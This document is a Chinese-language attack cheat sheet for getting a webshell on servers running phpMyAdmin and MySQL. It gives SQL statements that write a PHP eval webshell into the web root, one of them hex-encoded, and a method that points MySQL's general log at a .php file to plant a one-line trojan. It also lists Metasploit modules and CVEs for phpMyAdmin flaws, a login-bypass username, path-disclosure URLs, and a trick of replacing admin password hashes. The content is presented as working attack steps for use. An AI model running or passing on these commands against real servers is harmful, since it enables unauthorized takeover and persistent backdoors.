一、phpmyadmin getshell
1、写文件getshell
a、mysql账户权限
mysql账户需要有文件操作的权限
select * from mysql.user where user='test' and host='127.0.0.1';
b、mysql数据库的权限
在 MySQL 5.5 之前 secure_file_priv 默认是空,这个情况下可以向任意绝对路径写文件
在 MySQL 5.5之后 secure_file_priv 默认是 NULL,这个情况下不可以写文件
select @@secure_file_priv;
c、绝对路径
select '123' into outfile 'c:/shell.php';
select unhex('3c3f706870206576616c28245f524551554553545b636d645d293b3f3e') into dumpfile 'D:/WEB/shell.php';
select 0x3c3f706870206576616c28245f524551554553545b636d645d293b3f3e into outfile ’d:/xamp/www/ok.php’
2、日志保存getshell
MySQL5.0版本以上会创建日志文件,通过修改日志的全局变量打开日志并指定日志保存路径,再通过查询写入一句话木马,此时该木马会被日志记录并生成日志文件,从而GetShell。但是前提是要对生成的日志文件有读写权限。
a、查询日志全局变量
show variables like '%general%';
b、开启日志保存并配置保存路径
set global general_log = "ON";
set global general_log_file = "G:/phpstudy/WWW/log.php"; -- 设置日志保存路径,需先得知网站物理路径,否则即使写入了Shell也无法通过URL连接
c、执行sql语句来写入webshell
select '<?php eval($_POST[pwd]); ?>';
3、phpmyadmin漏洞getshell
0x01 PREGREPLACEEVAL漏洞
影响版本:3.5.x < 3.5.8.1 and 4.0.0 < 4.0.0-rc3 ANYUN.ORG
利用模块:exploit/multi/http/phpmyadminpregreplace CVE: CVE-2013-3238
——————————————————————————————————————
0x02 serversync.php 后门漏洞
影响版本:phpMyAdmin v3.5.2.2
利用模块:exploit/multi/http/phpmyadmin3522_backdoor CVE: CVE-2012-5159
——————————————————————————————————————
0x03 PhpMyAdmin配置文件/config/config.inc.php存在命令执行
影响版本: 2.11.x < 2.11.9.5 and 3.x < 3.1.3.1;
利用模块:exploit/unix/webapp/phpmyadmin_config CVE: CVE-2009-1151
——————————————————————————————————————
0x04 万能登陆
影响版本:2.11.3 / 2.11.4
利用方法:用户名处写入'localhost'@'@"则登录成功。 (注意全部是英文标点符号,最后一个为英文双引号)
——————————————————————————————————————
0x05 phpmyadmin配合phpinfo getshell
影响版本:2.8.0.3
phpmyadmin暴露绝对路径的url:
phpMyAdmin/libraries/selectlang.lib.php
phpMyAdmin/darkblueorange/layout.inc.php phpMyAdmin/index.php?lang[]=1
phpmyadmin/themes/darkblue_orange/layout.inc.ph
二、其他方式getshell
如果以上方式都不行,而且对应后台的Hash密码无法破解,我们可以搜索对应框架的默认hash密码,在对应user表处进行替换,从而登录后台getshell